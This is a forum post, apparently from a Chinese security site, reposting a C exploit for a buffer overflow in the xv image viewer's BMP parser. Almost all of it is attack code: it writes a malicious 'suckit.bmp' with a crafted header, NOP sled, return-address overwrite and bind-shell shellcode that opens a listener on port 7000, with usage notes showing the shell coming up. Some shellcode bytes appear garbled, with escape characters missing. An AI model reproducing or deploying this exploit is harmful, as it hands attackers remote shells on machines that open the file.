‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Xv bmp parsing buffer overflow exploit

冰血封情

老林

团队决策人

Rank: 9Rank: 9Rank: 9

E.S.T运营责任人

帖子
6825 
精华
834 
积分
36073 
阅读权限
255 
性别
男 
来自
中国 
在线时间
591 小时 
注册时间
2004-6-25 
最后登录
2008-10-12 

优秀管理奖 资料收集奖 原创技术奖 核心建议奖

楼主 发表于 2004-8-21 18:00  只看该作者

Xv bmp parsing buffer overflow exploit

文章作者:infamous42md
复制内容到剪贴板
代码:
/*
* xv exploit for the bmp parsing buffer overflow
*
* infamous42md AT hotpop DOT com
* PEOPLE STOP EMAILING MY BUGTRAQ ADDRESS AND USE THIS ONE!!
*
* [n00b_at_localho.outernet] gcc -Wall xv_bmpslap.c
* [n00b_at_localho.outernet] ./a.out
* Usage: ./a.out < retaddr > [ align ]
* [n00b_at_localho.outernet] ./a.out 0xbffff388
* [n00b_at_localho.outernet] netstat -ant | grep 7000
* [n00b_at_localho.outernet] ./xv suckit.bmp
* [n00b_at_localho.outernet] netstat -ant | grep 7000
* tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN
   *
*/
#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netinet/in.h>



#define ALIGN 0
#define NOP 0x90
#define NNOPS 256
#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)
#define BS 0x10000
#define OUTFILE "suckit.bmp"
#define OVERWRITE_BYTES 700



/* a bitmap header structure */
#define BMP_HDR_SZ sizeof(struct bmp)
struct bmp {
   u_char type[2];
   u_int bfsize,
        reserved,
        offbits,
        bisize, /* 40 */
        width,
        height;
   u_short planes, /* 1 */
        bitcount; /* 4 */
   u_int compres, /* != 1 */
        szimg,
        xppm,
        ypppm,
        clrused, /* write length */
        clrimportant;
} __attribute__ ((packed));



/* for easy access */
typedef union _ret {
   u_long ret;
   u_char retb[sizeof(u_long)];
} ret_t;



/* call them on port 7000, mine */
char remote[] =
"x31xc0x50x50x66xc7x44x24x02x1bx58xc6x04x24x02x89xe6"
"xb0x02xcdx80x85xc0x74x08x31xc0x31xdbxb0x01xcdx80x50"
"x6ax01x6ax02x89xe1x31xdbxb0x66xb3x01xcdx80x89xc5x6a"
"x10x56x50x89xe1xb0x66xb3x02xcdx80x6ax01x55x89xe1x31"
"xc0x31xdbxb0x66xb3x04xcdx80x31xc0x50x50x55x89xe1xb0"
"x66xb3x05xcdx80x89xc5x31xc0x89xebx31xc9xb0x3fxcdx80"
"x41x80xf9x03x7cxf6x31xc0x50x68x2fx2fx73x68x68x2fx62"
"x69x6ex89xe3x50x53x89xe1x99xb0x0bxcdx80xa1x5fx66x6ex69";
   


void make_bmp(char *buf, int len)
{
   int fd = 0;


   /* create the 3vil file */
   if( (fd = open(OUTFILE, O_RDWR|O_CREAT, 0666)) < 0)
      die("open");
   
   if(write(fd, buf, len) < 0)
      die("write");


   close(fd);
}


/*
*
*/
int main(int argc, char **argv)
{
   int len, x, align = ALIGN;
   char buf[BS];
   ret_t retaddr;
   struct bmp bmp;
  
   if(argc < 2){
      fprintf(stderr, "tUsage: %s < retaddr > [ align ]n", argv[0]);
      return EXIT_FAILURE;
   }
   if(argc > 2){
      align = atoi(argv[2]);
      if(align < 0 || align > 3)
        die("get bent bitch");
   }
   sscanf(argv[1], "%lx", &retaddr.ret);


   /* setup bitmap */
   memset(&bmp, 0, BMP_HDR_SZ);
   bmp.type[0] = &#39;B&#39;, bmp.type[1] = &#39;M&#39;;
   bmp.bisize = 40;
   bmp.bitcount = 4;
   bmp.clrused = OVERWRITE_BYTES;
   bmp.planes = 1;
   
   /* create 3vil buf */
   memset(buf, NOP, BS);
   memcpy(buf, &bmp, BMP_HDR_SZ);
   len = BMP_HDR_SZ;
   len += align;
   
   /* fill in ret address starting at byte offset 0, every other 4 bytes */
   for(x = 0; x < OVERWRITE_BYTES; x++)
      buf[len + (x*4)] = retaddr.retb[x & 0x3];


   /* fill in shell after NOPS, at byte offset 2, every other 4 bytes */
   for(x = 0; x < strlen(remote); x++)
      buf[len + (NNOPS*4) + (x*4) + 2] = remote[x];


   /* extra */
   len += OVERWRITE_BYTES * 10;
   make_bmp(buf, len);


   return 0;
}
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题